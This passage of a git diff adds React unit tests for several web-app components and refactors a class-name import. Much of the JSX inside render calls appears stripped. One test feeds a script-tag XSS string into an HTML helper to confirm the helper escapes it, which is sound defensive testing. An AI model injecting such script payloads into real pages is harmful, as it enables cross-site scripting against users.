-0,0 +1,21 @@ +import { render, screen } from '@testing-library/react' +import GroupName from './index' + +describe('GroupName', () => { + beforeEach(() => { + jest.clearAllMocks() + }) + + describe('Rendering', () => { + it('should render name when provided', () => { + // Arrange + const title = 'Inputs' + + // Act + render() + + // Assert + expect(screen.getByText(title)).toBeInTheDocument() + }) + }) +}) diff --git a/web/app/components/app/configuration/base/operation-btn/index.spec.tsx b/web/app/components/app/configuration/base/operation-btn/index.spec.tsx new file mode 100644 index 0000000000..615a1769e8 --- /dev/null +++ b/web/app/components/app/configuration/base/operation-btn/index.spec.tsx @@ -0,0 +1,70 @@ +import { fireEvent, render, screen } from '@testing-library/react' +import OperationBtn from './index' + +jest.mock('@remixicon/react', () => ({ + RiAddLine: (props: { className?: string }) => ( + + ), + RiEditLine: (props: { className?: string }) => ( + + ), +})) + +describe('OperationBtn', () => { + beforeEach(() => { + jest.clearAllMocks() + }) + + // Rendering icons and translation labels + describe('Rendering', () => { + it('should render passed custom class when provided', () => { + // Arrange + const customClass = 'custom-class' + + // Act + render() + + // Assert + expect(screen.getByText('common.operation.add').parentElement).toHaveClass(customClass) + }) + it('should render add icon when type is add', () => { + // Arrange + const onClick = jest.fn() + + // Act + render() + + // Assert + expect(screen.getByTestId('add-icon')).toBeInTheDocument() + expect(screen.getByText('common.operation.add')).toBeInTheDocument() + }) + + it('should render edit icon when provided', () => { + // Arrange + const actionName = 'Rename' + + // Act + render() + + // Assert + expect(screen.getByTestId('edit-icon')).toBeInTheDocument() + expect(screen.queryByTestId('add-icon')).toBeNull() + expect(screen.getByText(actionName)).toBeInTheDocument() + }) + }) + + // Click handling + describe('Interactions', () => { + it('should execute click handler when button is clicked', () => { + // Arrange + const onClick = jest.fn() + render() + + // Act + fireEvent.click(screen.getByText('common.operation.add')) + + // Assert + expect(onClick).toHaveBeenCalledTimes(1) + }) + }) +}) diff --git a/web/app/components/app/configuration/base/operation-btn/index.tsx b/web/app/components/app/configuration/base/operation-btn/index.tsx index aba35cded2..db19d2976e 100644 --- a/web/app/components/app/configuration/base/operation-btn/index.tsx +++ b/web/app/components/app/configuration/base/operation-btn/index.tsx @@ -6,7 +6,7 @@ import { RiAddLine, RiEditLine, } from '@remixicon/react' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { noop } from 'lodash-es' export type IOperationBtnProps = { diff --git a/web/app/components/app/configuration/base/var-highlight/index.spec.tsx b/web/app/components/app/configuration/base/var-highlight/index.spec.tsx new file mode 100644 index 0000000000..9e84aa09ac --- /dev/null +++ b/web/app/components/app/configuration/base/var-highlight/index.spec.tsx @@ -0,0 +1,62 @@ +import { render, screen } from '@testing-library/react' +import VarHighlight, { varHighlightHTML } from './index' + +describe('VarHighlight', () => { + beforeEach(() => { + jest.clearAllMocks() + }) + + // Rendering highlighted variable tags + describe('Rendering', () => { + it('should render braces around the variable name with default styles', () => { + // Arrange + const props = { name: 'userInput' } + + // Act + const { container } = render() + + // Assert + expect(screen.getByText('userInput')).toBeInTheDocument() + expect(screen.getAllByText('{{')[0]).toBeInTheDocument() + expect(screen.getAllByText('}}')[0]).toBeInTheDocument() + expect(container.firstChild).toHaveClass('item') + }) + + it('should apply custom class names when provided', () => { + // Arrange + const props = { name: 'custom', className: 'mt-2' } + + // Act + const { container } = render() + + // Assert + expect(container.firstChild).toHaveClass('mt-2') + }) + }) + + // Escaping HTML via helper + describe('varHighlightHTML', () => { + it('should escape dangerous characters before returning HTML string', () => { + // Arrange + const props = { name: '' } + + // Act + const html = varHighlightHTML(props) + + // Assert + expect(html).toContain('<script>alert('xss')</script>') + expect(html).not.toContain(' & Special "Chars"', + }, + } + render() + + expect(screen.getByText('App & Special "Chars"')).toBeInTheDocument() + }) + + it('should handle onCreate function throwing error', async () => { + const errorOnCreate = jest.fn(() => { + throw new Error('Create failed') + }) + + // Mock console.error to avoid test output noise + const consoleSpy = jest.spyOn(console, 'error').mockImplementation(jest.fn()) + + render() + + const button = screen.getByRole('button', { name: /app\.newApp\.useTemplate/ }) + let capturedError: unknown + try { + await userEvent.click(button) + } + catch (err) { + capturedError = err + } + expect(errorOnCreate).toHaveBeenCalledTimes(1) + expect(consoleSpy).toHaveBeenCalled() + if (capturedError instanceof Error) + expect(capturedError.message).toContain('Create failed') + + consoleSpy.mockRestore() + }) + }) + + describe('Accessibility', () => { + it('should have proper elements for accessibility', () => { + const { container } = render() + + expect(container.querySelector('em-emoji')).toBeInTheDocument() + expect(container.querySelector('svg')).toBeInTheDocument() + }) + + it('should have title attribute for app name when truncated', () => { + render() + + const nameElement = screen.getByText('Test Chat App') + expect(nameElement).toHaveAttribute('title', 'Test Chat App') + }) + + it('should have accessible button with proper label', () => { + render() + + const button = screen.getByRole('button', { name: /app\.newApp\.useTemplate/ }) + expect(button).toBeEnabled() + expect(button).toHaveTextContent('app.newApp.useTemplate') + }) + }) + + describe('User-Visible Behavior Tests', () => { + it('should show plus icon in create button', () => { + render() + + expect(screen.getByTestId('plus-icon')).toBeInTheDocument() + }) + }) +}) diff --git a/web/app/components/app/create-app-dialog/app-card/index.tsx b/web/app/components/app/create-app-dialog/app-card/index.tsx index 7f7ede0065..df35a74ec7 100644 --- a/web/app/components/app/create-app-dialog/app-card/index.tsx +++ b/web/app/components/app/create-app-dialog/app-card/index.tsx @@ -3,7 +3,7 @@ import { useTranslation } from 'react-i18next' import { PlusIcon } from '@heroicons/react/20/solid' import { AppTypeIcon, AppTypeLabel } from '../../type-selector' import Button from '@/app/components/base/button' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import type { App } from '@/models/explore' import AppIcon from '@/app/components/base/app-icon' @@ -15,6 +15,7 @@ export type AppCardProps = { const AppCard = ({ app, + canCreate, onCreate, }: AppCardProps) => { const { t } = useTranslation() @@ -45,14 +46,16 @@ const AppCard = ({ {app.description}
- ) } diff --git a/web/app/components/app/create-app-dialog/app-list/index.tsx b/web/app/components/app/create-app-dialog/app-list/index.tsx index 51b6874d52..4655d7a676 100644 --- a/web/app/components/app/create-app-dialog/app-list/index.tsx +++ b/web/app/components/app/create-app-dialog/app-list/index.tsx @@ -11,7 +11,7 @@ import AppCard from '../app-card' import Sidebar, { AppCategories, AppCategoryLabel } from './sidebar' import Toast from '@/app/components/base/toast' import Divider from '@/app/components/base/divider' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import ExploreContext from '@/context/explore-context' import type { App } from '@/models/explore' import { fetchAppDetail, fetchAppList } from '@/service/explore' diff --git a/web/app/components/app/create-app-dialog/app-list/sidebar.tsx b/web/app/components/app/create-app-dialog/app-list/sidebar.tsx index 85c55c5385..89062cdcf9 100644 --- a/web/app/components/app/create-app-dialog/app-list/sidebar.tsx +++ b/web/app/components/app/create-app-dialog/app-list/sidebar.tsx @@ -1,7 +1,7 @@ 'use client' import { RiStickyNoteAddLine, RiThumbUpLine } from '@remixicon/react' import { useTranslation } from 'react-i18next' -import classNames from '@/utils/classnames' +import { cn } from '@/utils/classnames' import Divider from '@/app/components/base/divider' export enum AppCategories { @@ -40,13 +40,13 @@ type CategoryItemProps = { } function CategoryItem({ category, active, onClick }: CategoryItemProps) { return
  • { onClick?.(category) }}> {category === AppCategories.RECOMMENDED &&
    } + className={cn('system-sm-medium text-components-menu-item-text group-hover:text-components-menu-item-text-hover group-[.active]:text-components-menu-item-text-active', active && 'system-sm-semibold')} />
  • } diff --git a/web/app/components/app/create-app-dialog/index.spec.tsx b/web/app/components/app/create-app-dialog/index.spec.tsx new file mode 100644 index 0000000000..db4384a173 --- /dev/null +++ b/web/app/components/app/create-app-dialog/index.spec.tsx @@ -0,0 +1,287 @@ +import { fireEvent, render, screen } from '@testing-library/react' +import CreateAppTemplateDialog from './index' + +// Mock external dependencies (not base components) +jest.mock('./app-list', () => { + return function MockAppList({ + onCreateFromBlank, + onSuccess, + }: { + onCreateFromBlank?: () => void + onSuccess: () => void + }) { + return ( +
    + + {onCreateFromBlank && ( + + )} +
    + ) + } +}) + +jest.mock('ahooks', () => ({ + useKeyPress: jest.fn((_key: string, _callback: () => void) => { + // Mock implementation for testing + return jest.fn() + }), +})) + +describe('CreateAppTemplateDialog', () => { + const defaultProps = { + show: false, + onSuccess: jest.fn(), + onClose: jest.fn(), + onCreateFromBlank: jest.fn(), + } + + beforeEach(() => { + jest.clearAllMocks() + }) + + describe('Rendering', () => { + it('should not render when show is false', () => { + render() + + // FullScreenModal should not render any content when open is false + expect(screen.queryByRole('dialog')).not.toBeInTheDocument() + }) + + it('should render modal when show is true', () => { + render() + + // FullScreenModal renders with role="dialog" + expect(screen.getByRole('dialog')).toBeInTheDocument() + expect(screen.getByTestId('app-list')).toBeInTheDocument() + }) + + it('should render create from blank button when onCreateFromBlank is provided', () => { + render() + + expect(screen.getByTestId('create-from-blank')).toBeInTheDocument() + }) + + it('should not render create from blank button when onCreateFromBlank is not provided', () => { + const { onCreateFromBlank: _onCreateFromBlank, ...propsWithoutOnCreate } = defaultProps + + render() + + expect(screen.queryByTestId('create-from-blank')).not.toBeInTheDocument() + }) + }) + + describe('Props', () => { + it('should pass show prop to FullScreenModal', () => { + const { rerender } = render() + + expect(screen.queryByRole('dialog')).not.toBeInTheDocument() + + rerender() + expect(screen.getByRole('dialog')).toBeInTheDocument() + }) + + it('should pass closable prop to FullScreenModal', () => { + // Since the FullScreenModal is always rendered with closable=true + // we can verify that the modal renders with the proper structure + render() + + // Verify that the modal has the proper dialog structure + const dialog = screen.getByRole('dialog') + expect(dialog).toBeInTheDocument() + expect(dialog).toHaveAttribute('aria-modal', 'true') + }) + }) + + describe('User Interactions', () => { + it('should handle close interactions', () => { + const mockOnClose = jest.fn() + render() + + // Test that the modal is rendered + const dialog = screen.getByRole('dialog') + expect(dialog).toBeInTheDocument() + + // Test that AppList component renders (child component interactions) + expect(screen.getByTestId('app-list')).toBeInTheDocument() + expect(screen.getByTestId('app-list-success')).toBeInTheDocument() + }) + + it('should call both onSuccess and onClose when app list success is triggered', () => { + const mockOnSuccess = jest.fn() + const mockOnClose = jest.fn() + render() + + fireEvent.click(screen.getByTestId('app-list-success')) + + expect(mockOnSuccess).toHaveBeenCalledTimes(1) + expect(mockOnClose).toHaveBeenCalledTimes(1) + }) + + it('should call onCreateFromBlank when create from blank is clicked', () => { + const mockOnCreateFromBlank = jest.fn() + render() + + fireEvent.click(screen.getByTestId('create-from-blank')) + + expect(mockOnCreateFromBlank).toHaveBeenCalledTimes(1) + }) + }) + + describe('useKeyPress Integration', () => { + it('should set up ESC key listener when modal is shown', () => { + const { useKeyPress } = require('ahooks') + + render() + + expect(useKeyPress).toHaveBeenCalledWith('esc', expect.any(Function)) + }) + + it('should handle ESC key press to close modal', () => { + const { useKeyPress } = require('ahooks') + let capturedCallback: (() => void) | undefined + + useKeyPress.mockImplementation((key: string, callback: () => void) => { + if (key === 'esc') + capturedCallback = callback + + return jest.fn() + }) + + const mockOnClose = jest.fn() + render() + + expect(capturedCallback).toBeDefined() + expect(typeof capturedCallback).toBe('function') + + // Simulate ESC key press + capturedCallback?.() + + expect(mockOnClose).toHaveBeenCalledTimes(1) + }) + + it('should not call onClose when ESC key is pressed and modal is not shown', () => { + const { useKeyPress } = require('ahooks') + let capturedCallback: (() => void) | undefined + + useKeyPress.mockImplementation((key: string, callback: () => void) => { + if (key === 'esc') + capturedCallback = callback + + return jest.fn() + }) + + const mockOnClose = jest.fn() + render() + + // The callback should still be created but not execute onClose + expect(capturedCallback).toBeDefined() + + // Simulate ESC key press + capturedCallback?.() + + // onClose should not be called because modal is not shown + expect(mockOnClose).not.toHaveBeenCalled() + }) + }) + + describe('Callback Dependencies', () => { + it('should create stable callback reference for ESC key handler', () => { + const { useKeyPress } = require('ahooks') + + render() + + // Verify that useKeyPress was called with a function + const calls = useKeyPress.mock.calls + expect(calls.length).toBeGreaterThan(0) + expect(calls[0][0]).toBe('esc') + expect(typeof calls[0][1]).toBe('function') + }) + }) + + describe('Edge Cases', () => { + it('should handle null props gracefully', () => { + expect(() => { + render() + }).not.toThrow() + }) + + it('should handle undefined props gracefully', () => { + expect(() => { + render() + }).not.toThrow() + }) + + it('should handle rapid show/hide toggles', () => { + // Test initial state + const { unmount } = render() + unmount() + + // Test show state + render() + expect(screen.getByRole('dialog')).toBeInTheDocument() + + // Test hide state + render() + // Due to transition animations, we just verify the component handles the prop change + expect(() => render()).not.toThrow() + }) + + it('should handle missing optional onCreateFromBlank prop', () => { + const { onCreateFromBlank: _onCreateFromBlank, ...propsWithoutOnCreate } = defaultProps + + expect(() => { + render() + }).not.toThrow() + + expect(screen.getByTestId('app-list')).toBeInTheDocument() + expect(screen.queryByTestId('create-from-blank')).not.toBeInTheDocument() + }) + + it('should work with all required props only', () => { + const requiredProps = { + show: true, + onSuccess: jest.fn(), + onClose: jest.fn(), + } + + expect(() => { + render() + }).not.toThrow() + + expect(screen.getByRole('dialog')).toBeInTheDocument() + expect(screen.getByTestId('app-list')).toBeInTheDocument() + }) + }) +}) diff --git a/web/app/components/app/create-app-modal/index.tsx b/web/app/components/app/create-app-modal/index.tsx index a449ec8ef2..d74715187f 100644 --- a/web/app/components/app/create-app-modal/index.tsx +++ b/web/app/components/app/create-app-modal/index.tsx @@ -13,7 +13,7 @@ import AppIconPicker from '../../base/app-icon-picker' import type { AppIconSelection } from '../../base/app-icon-picker' import Button from '@/app/components/base/button' import Divider from '@/app/components/base/divider' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { basePath } from '@/utils/var' import { useAppContext } from '@/context/app-context' import { useProviderContext } from '@/context/provider-context' diff --git a/web/app/components/app/create-from-dsl-modal/index.tsx b/web/app/components/app/create-from-dsl-modal/index.tsx index 3564738dfd..0d30a2abac 100644 --- a/web/app/components/app/create-from-dsl-modal/index.tsx +++ b/web/app/components/app/create-from-dsl-modal/index.tsx @@ -25,7 +25,7 @@ import { useProviderContext } from '@/context/provider-context' import AppsFull from '@/app/components/billing/apps-full-in-dialog' import { NEED_REFRESH_APP_LIST_KEY } from '@/config' import { getRedirection } from '@/utils/app-redirection' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { usePluginDependencies } from '@/app/components/workflow/plugin-dependency/hooks' import { noop } from 'lodash-es' import { trackEvent } from '@/app/components/base/amplitude' diff --git a/web/app/components/app/create-from-dsl-modal/uploader.tsx b/web/app/components/app/create-from-dsl-modal/uploader.tsx index b6644da5a4..2745ca84c6 100644 --- a/web/app/components/app/create-from-dsl-modal/uploader.tsx +++ b/web/app/components/app/create-from-dsl-modal/uploader.tsx @@ -8,7 +8,7 @@ import { import { useTranslation } from 'react-i18next' import { useContext } from 'use-context-selector' import { formatFileSize } from '@/utils/format' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { Yaml as YamlIcon } from '@/app/components/base/icons/src/public/files' import { ToastContext } from '@/app/components/base/toast' import ActionButton from '@/app/components/base/action-button' diff --git a/web/app/components/app/duplicate-modal/index.spec.tsx b/web/app/components/app/duplicate-modal/index.spec.tsx new file mode 100644 index 0000000000..2d73addeab --- /dev/null +++ b/web/app/components/app/duplicate-modal/index.spec.tsx @@ -0,0 +1,167 @@ +import React from 'react' +import { render, screen } from '@testing-library/react' +import userEvent from '@testing-library/user-event' +import DuplicateAppModal from './index' +import Toast from '@/app/components/base/toast' +import type { ProviderContextState } from '@/context/provider-context' +import { baseProviderContextValue } from '@/context/provider-context' +import { Plan } from '@/app/components/billing/type' + +const appsFullRenderSpy = jest.fn() +jest.mock('@/app/components/billing/apps-full-in-dialog', () => ({ + __esModule: true, + default: ({ loc }: { loc: string }) => { + appsFullRenderSpy(loc) + return
    AppsFull
    + }, +})) + +const useProviderContextMock = jest.fn() +jest.mock('@/context/provider-context', () => { + const actual = jest.requireActual('@/context/provider-context') + return { + ...actual, + useProviderContext: () => useProviderContextMock(), + } +}) + +const renderComponent = (overrides: Partial> = {}) => { + const onConfirm = jest.fn().mockResolvedValue(undefined) + const onHide = jest.fn() + const props: React.ComponentProps = { + appName: 'My App', + icon_type: 'emoji', + icon: '🚀', + icon_background: '#FFEAD5', + icon_url: null, + show: true, + onConfirm, + onHide, + ...overrides, + } + const utils = render() + return { + ...utils, + onConfirm, + onHide, + } +} + +const setupProviderContext = (overrides: Partial = {}) => { + useProviderContextMock.mockReturnValue({ + ...baseProviderContextValue, + plan: { + ...baseProviderContextValue.plan, + type: Plan.sandbox, + usage: { + ...baseProviderContextValue.plan.usage, + buildApps: 0, + }, + total: { + ...baseProviderContextValue.plan.total, + buildApps: 10, + }, + }, + enableBilling: false, + ...overrides, + } as ProviderContextState) +} + +describe('DuplicateAppModal', () => { + beforeEach(() => { + jest.clearAllMocks() + setupProviderContext() + }) + + // Rendering output based on modal visibility. + describe('Rendering', () => { + it('should render modal content when show is true', () => { + // Arrange + renderComponent() + + // Assert + expect(screen.getByText('app.duplicateTitle')).toBeInTheDocument() + expect(screen.getByDisplayValue('My App')).toBeInTheDocument() + }) + + it('should not render modal content when show is false', () => { + // Arrange + renderComponent({ show: false }) + + // Assert + expect(screen.queryByText('app.duplicateTitle')).not.toBeInTheDocument() + }) + }) + + // Prop-driven states such as full plan handling. + describe('Props', () => { + it('should disable duplicate button and show apps full content when plan is full', () => { + // Arrange + setupProviderContext({ + enableBilling: true, + plan: { + ...baseProviderContextValue.plan, + type: Plan.sandbox, + usage: { ...baseProviderContextValue.plan.usage, buildApps: 10 }, + total: { ...baseProviderContextValue.plan.total, buildApps: 10 }, + }, + }) + renderComponent() + + // Assert + expect(screen.getByTestId('apps-full')).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'app.duplicate' })).toBeDisabled() + }) + }) + + // User interactions for cancel and confirm flows. + describe('Interactions', () => { + it('should call onHide when cancel is clicked', async () => { + const user = userEvent.setup() + // Arrange + const { onHide } = renderComponent() + + // Act + await user.click(screen.getByRole('button', { name: 'common.operation.cancel' })) + + // Assert + expect(onHide).toHaveBeenCalledTimes(1) + }) + + it('should show error toast when name is empty', async () => { + const user = userEvent.setup() + const toastSpy = jest.spyOn(Toast, 'notify') + // Arrange + const { onConfirm, onHide } = renderComponent() + + // Act + await user.clear(screen.getByDisplayValue('My App')) + await user.click(screen.getByRole('button', { name: 'app.duplicate' })) + + // Assert + expect(toastSpy).toHaveBeenCalledWith({ type: 'error', message: 'explore.appCustomize.nameRequired' }) + expect(onConfirm).not.toHaveBeenCalled() + expect(onHide).not.toHaveBeenCalled() + }) + + it('should submit app info and hide modal when duplicate is clicked', async () => { + const user = userEvent.setup() + // Arrange + const { onConfirm, onHide } = renderComponent() + + // Act + await user.clear(screen.getByDisplayValue('My App')) + await user.type(screen.getByRole('textbox'), 'New App') + await user.click(screen.getByRole('button', { name: 'app.duplicate' })) + + // Assert + expect(onConfirm).toHaveBeenCalledWith({ + name: 'New App', + icon_type: 'emoji', + icon: '🚀', + icon_background: '#FFEAD5', + }) + expect(onHide).toHaveBeenCalledTimes(1) + }) + }) +}) diff --git a/web/app/components/app/duplicate-modal/index.tsx b/web/app/components/app/duplicate-modal/index.tsx index f98fb831ed..f25eb5373d 100644 --- a/web/app/components/app/duplicate-modal/index.tsx +++ b/web/app/components/app/duplicate-modal/index.tsx @@ -3,7 +3,7 @@ import React, { useState } from 'react' import { useTranslation } from 'react-i18next' import { RiCloseLine } from '@remixicon/react' import AppIconPicker from '../../base/app-icon-picker' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import Modal from '@/app/components/base/modal' import Button from '@/app/components/base/button' import Input from '@/app/components/base/input' diff --git a/web/app/components/app/log-annotation/index.tsx b/web/app/components/app/log-annotation/index.tsx index c0b0854b29..e7c2be3eed 100644 --- a/web/app/components/app/log-annotation/index.tsx +++ b/web/app/components/app/log-annotation/index.tsx @@ -3,7 +3,7 @@ import type { FC } from 'react' import React, { useMemo } from 'react' import { useTranslation } from 'react-i18next' import { useRouter } from 'next/navigation' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import Log from '@/app/components/app/log' import WorkflowLog from '@/app/components/app/workflow-log' import Annotation from '@/app/components/app/annotation' diff --git a/web/app/components/app/log/list.tsx b/web/app/components/app/log/list.tsx index 0ff375d815..e479cbe881 100644 --- a/web/app/components/app/log/list.tsx +++ b/web/app/components/app/log/list.tsx @@ -39,7 +39,7 @@ import Tooltip from '@/app/components/base/tooltip' import CopyIcon from '@/app/components/base/copy-icon' import { buildChatItemTree, getThreadMessages } from '@/app/components/base/chat/utils' import { getProcessedFilesFromResponse } from '@/app/components/base/file-uploader/utils' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { noop } from 'lodash-es' import PromptLogModal from '../../base/prompt-log-modal' import { WorkflowContextProvider } from '@/app/components/workflow/context' diff --git a/web/app/components/app/log/model-info.tsx b/web/app/components/app/log/model-info.tsx index 626ef093e9..b3c4f11be5 100644 --- a/web/app/components/app/log/model-info.tsx +++ b/web/app/components/app/log/model-info.tsx @@ -13,7 +13,7 @@ import { PortalToFollowElemTrigger, } from '@/app/components/base/portal-to-follow-elem' import { useTextGenerationCurrentProviderAndModelAndModelList } from '@/app/components/header/account-setting/model-provider-page/hooks' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' const PARAM_MAP = { temperature: 'Temperature', diff --git a/web/app/components/app/log/var-panel.tsx b/web/app/components/app/log/var-panel.tsx index dd8c231a56..8915b3438a 100644 --- a/web/app/components/app/log/var-panel.tsx +++ b/web/app/components/app/log/var-panel.tsx @@ -9,7 +9,7 @@ import { } from '@remixicon/react' import { Variable02 } from '@/app/components/base/icons/src/vender/solid/development' import ImagePreview from '@/app/components/base/image-uploader/image-preview' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' type Props = { varList: { label: string; value: string }[] diff --git a/web/app/components/app/overview/apikey-info-panel/apikey-info-panel.test-utils.tsx b/web/app/components/app/overview/apikey-info-panel/apikey-info-panel.test-utils.tsx new file mode 100644 index 0000000000..1b1e729546 --- /dev/null +++ b/web/app/components/app/overview/apikey-info-panel/apikey-info-panel.test-utils.tsx @@ -0,0 +1,209 @@ +import type { RenderOptions } from '@testing-library/react' +import { fireEvent, render } from '@testing-library/react' +import { defaultPlan } from '@/app/components/billing/config' +import { noop } from 'lodash-es' +import type { ModalContextState } from '@/context/modal-context' +import APIKeyInfoPanel from './index' + +// Mock the modules before importing the functions +jest.mock('@/context/provider-context', () => ({ + useProviderContext: jest.fn(), +})) + +jest.mock('@/context/modal-context', () => ({ + useModalContext: jest.fn(), +})) + +import { useProviderContext as actualUseProviderContext } from '@/context/provider-context' +import { useModalContext as actualUseModalContext } from '@/context/modal-context' + +// Type casting for mocks +const mockUseProviderContext = actualUseProviderContext as jest.MockedFunction +const mockUseModalContext = actualUseModalContext as jest.MockedFunction + +// Default mock data +const defaultProviderContext = { + modelProviders: [], + refreshModelProviders: noop, + textGenerationModelList: [], + supportRetrievalMethods: [], + isAPIKeySet: false, + plan: defaultPlan, + isFetchedPlan: false, + enableBilling: false, + onPlanInfoChanged: noop, + enableReplaceWebAppLogo: false, + modelLoadBalancingEnabled: false, + datasetOperatorEnabled: false, + enableEducationPlan: false, + isEducationWorkspace: false, + isEducationAccount: false, + allowRefreshEducationVerify: false, + educationAccountExpireAt: null, + isLoadingEducationAccountInfo: false, + isFetchingEducationAccountInfo: false, + webappCopyrightEnabled: false, + licenseLimit: { + workspace_members: { + size: 0, + limit: 0, + }, + }, + refreshLicenseLimit: noop, + isAllowTransferWorkspace: false, + isAllowPublishAsCustomKnowledgePipelineTemplate: false, +} + +const defaultModalContext: ModalContextState = { + setShowAccountSettingModal: noop, + setShowApiBasedExtensionModal: noop, + setShowModerationSettingModal: noop, + setShowExternalDataToolModal: noop, + setShowPricingModal: noop, + setShowAnnotationFullModal: noop, + setShowModelModal: noop, + setShowExternalKnowledgeAPIModal: noop, + setShowModelLoadBalancingModal: noop, + setShowOpeningModal: noop, + setShowUpdatePluginModal: noop, + setShowEducationExpireNoticeModal: noop, + setShowTriggerEventsLimitModal: noop, +} + +export type MockOverrides = { + providerContext?: Partial + modalContext?: Partial +} + +export type APIKeyInfoPanelRenderOptions = { + mockOverrides?: MockOverrides +} & Omit + +// Setup function to configure mocks +export function setupMocks(overrides: MockOverrides = {}) { + mockUseProviderContext.mockReturnValue({ + ...defaultProviderContext, + ...overrides.providerContext, + }) + + mockUseModalContext.mockReturnValue({ + ...defaultModalContext, + ...overrides.modalContext, + }) +} + +// Custom render function +export function renderAPIKeyInfoPanel(options: APIKeyInfoPanelRenderOptions = {}) { + const { mockOverrides, ...renderOptions } = options + + setupMocks(mockOverrides) + + return render(, renderOptions) +} + +// Helper functions for common test scenarios +export const scenarios = { + // Render with API key not set (default) + withAPIKeyNotSet: (overrides: MockOverrides = {}) => + renderAPIKeyInfoPanel({ + mockOverrides: { + providerContext: { isAPIKeySet: false }, + ...overrides, + }, + }), + + // Render with API key already set + withAPIKeySet: (overrides: MockOverrides = {}) => + renderAPIKeyInfoPanel({ + mockOverrides: { + providerContext: { isAPIKeySet: true }, + ...overrides, + }, + }), + + // Render with mock modal function + withMockModal: (mockSetShowAccountSettingModal: jest.Mock, overrides: MockOverrides = {}) => + renderAPIKeyInfoPanel({ + mockOverrides: { + modalContext: { setShowAccountSettingModal: mockSetShowAccountSettingModal }, + ...overrides, + }, + }), +} + +// Common test assertions +export const assertions = { + // Should render main button + shouldRenderMainButton: () => { + const button = document.querySelector('button.btn-primary') + expect(button).toBeInTheDocument() + return button + }, + + // Should not render at all + shouldNotRender: (container: HTMLElement) => { + expect(container.firstChild).toBeNull() + }, + + // Should have correct panel styling + shouldHavePanelStyling: (panel: HTMLElement) => { + expect(panel).toHaveClass( + 'border-components-panel-border', + 'bg-components-panel-bg', + 'relative', + 'mb-6', + 'rounded-2xl', + 'border', + 'p-8', + 'shadow-md', + ) + }, + + // Should have close button + shouldHaveCloseButton: (container: HTMLElement) => { + const closeButton = container.querySelector('.absolute.right-4.top-4') + expect(closeButton).toBeInTheDocument() + expect(closeButton).toHaveClass('cursor-pointer') + return closeButton + }, +} + +// Common user interactions +export const interactions = { + // Click the main button + clickMainButton: () => { + const button = document.querySelector('button.btn-primary') + if (button) fireEvent.click(button) + return button + }, + + // Click the close button + clickCloseButton: (container: HTMLElement) => { + const closeButton = container.querySelector('.absolute.right-4.top-4') + if (closeButton) fireEvent.click(closeButton) + return closeButton + }, +} + +// Text content keys for assertions +export const textKeys = { + selfHost: { + titleRow1: /appOverview\.apiKeyInfo\.selfHost\.title\.row1/, + titleRow2: /appOverview\.apiKeyInfo\.selfHost\.title\.row2/, + setAPIBtn: /appOverview\.apiKeyInfo\.setAPIBtn/, + tryCloud: /appOverview\.apiKeyInfo\.tryCloud/, + }, + cloud: { + trialTitle: /appOverview\.apiKeyInfo\.cloud\.trial\.title/, + trialDescription: /appOverview\.apiKeyInfo\.cloud\.trial\.description/, + setAPIBtn: /appOverview\.apiKeyInfo\.setAPIBtn/, + }, +} + +// Setup and cleanup utilities +export function clearAllMocks() { + jest.clearAllMocks() +} + +// Export mock functions for external access +export { mockUseProviderContext, mockUseModalContext, defaultModalContext } diff --git a/web/app/components/app/overview/apikey-info-panel/cloud.spec.tsx b/web/app/components/app/overview/apikey-info-panel/cloud.spec.tsx new file mode 100644 index 0000000000..c7cb061fde --- /dev/null +++ b/web/app/components/app/overview/apikey-info-panel/cloud.spec.tsx @@ -0,0 +1,122 @@ +import { cleanup, screen } from '@testing-library/react' +import { ACCOUNT_SETTING_TAB } from '@/app/components/header/account-setting/constants' +import { + assertions, + clearAllMocks, + defaultModalContext, + interactions, + mockUseModalContext, + scenarios, + textKeys, +} from './apikey-info-panel.test-utils' + +// Mock config for Cloud edition +jest.mock('@/config', () => ({ + IS_CE_EDITION: false, // Test Cloud edition +})) + +afterEach(cleanup) + +describe('APIKeyInfoPanel - Cloud Edition', () => { + const mockSetShowAccountSettingModal = jest.fn() + + beforeEach(() => { + clearAllMocks() + mockUseModalContext.mockReturnValue({ + ...defaultModalContext, + setShowAccountSettingModal: mockSetShowAccountSettingModal, + }) + }) + + describe('Rendering', () => { + it('should render without crashing when API key is not set', () => { + scenarios.withAPIKeyNotSet() + assertions.shouldRenderMainButton() + }) + + it('should not render when API key is already set', () => { + const { container } = scenarios.withAPIKeySet() + assertions.shouldNotRender(container) + }) + + it('should not render when panel is hidden by user', () => { + const { container } = scenarios.withAPIKeyNotSet() + interactions.clickCloseButton(container) + assertions.shouldNotRender(container) + }) + }) + + describe('Cloud Edition Content', () => { + it('should display cloud version title', () => { + scenarios.withAPIKeyNotSet() + expect(screen.getByText(textKeys.cloud.trialTitle)).toBeInTheDocument() + }) + + it('should display emoji for cloud version', () => { + const { container } = scenarios.withAPIKeyNotSet() + expect(container.querySelector('em-emoji')).toBeInTheDocument() + expect(container.querySelector('em-emoji')).toHaveAttribute('id', '😀') + }) + + it('should display cloud version description', () => { + scenarios.withAPIKeyNotSet() + expect(screen.getByText(textKeys.cloud.trialDescription)).toBeInTheDocument() + }) + + it('should not render external link for cloud version', () => { + const { container } = scenarios.withAPIKeyNotSet() + expect(container.querySelector('a[href="https://cloud.dify.ai/apps"]')).not.toBeInTheDocument() + }) + + it('should display set API button text', () => { + scenarios.withAPIKeyNotSet() + expect(screen.getByText(textKeys.cloud.setAPIBtn)).toBeInTheDocument() + }) + }) + + describe('User Interactions', () => { + it('should call setShowAccountSettingModal when set API button is clicked', () => { + scenarios.withMockModal(mockSetShowAccountSettingModal) + + interactions.clickMainButton() + + expect(mockSetShowAccountSettingModal).toHaveBeenCalledWith({ + payload: ACCOUNT_SETTING_TAB.PROVIDER, + }) + }) + + it('should hide panel when close button is clicked', () => { + const { container } = scenarios.withAPIKeyNotSet() + expect(container.firstChild).toBeInTheDocument() + + 